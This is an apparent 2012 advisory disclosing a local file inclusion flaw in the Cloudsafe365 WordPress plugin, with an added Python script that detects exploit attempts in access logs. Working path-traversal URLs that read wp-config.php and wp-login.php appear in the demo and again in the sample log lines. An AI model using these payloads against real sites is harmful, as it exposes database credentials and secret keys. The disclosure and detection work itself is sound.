
WordPress Cloudsafe365 Local File Inclusion

Posted on 29 August 2012

This WordPress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this.

Demo:

http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php

Disclosure timeline:

* Today: visit wordpress.org
* Try to report bug
* System wants login
* Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name
* Stuff it, I'm not going to phone them
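
To check whether this endpoint has been requested with a traversal payload on your own site, the following added example (not part of the original advisory and not the plugin's code) scans access-log lines for requests to the cs365_edit.php path shown in the demo URLs whose file parameter leaves its directory. It goes slightly beyond the demo by also normalising percent-encoded and double-encoded values; the combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint path taken from the advisory's demo URLs.
ENDPOINT = "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if a file parameter leaves the directory it is meant to stay in."""
    path = fully_decode(value).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/") or "\x00" in path

def suspicious_requests(log_lines):
    """Return (client, decoded_file_value) for traversal requests to the editor."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(ENDPOINT):
            continue
        for value in parse_qs(url.query).get("file", []):
            if is_traversal(value):
                hits.append((line.split(" ", 1)[0], fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Aug/2012:10:01:02 +0000] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [29/Aug/2012:10:01:09 +0000] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=%252e%252e%252fwp-login.php HTTP/1.1" 200 901',
    '198.51.100.4 - - [29/Aug/2012:10:02:00 +0000] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=style.css HTTP/1.1" 200 512',
    '198.51.100.9 - - [29/Aug/2012:10:03:00 +0000] "GET /index.php?file=../x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(client, value)
```

A 200 response to a flagged request is the case to investigate first, since wp-config.php holds the database credentials and secret keys.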

 
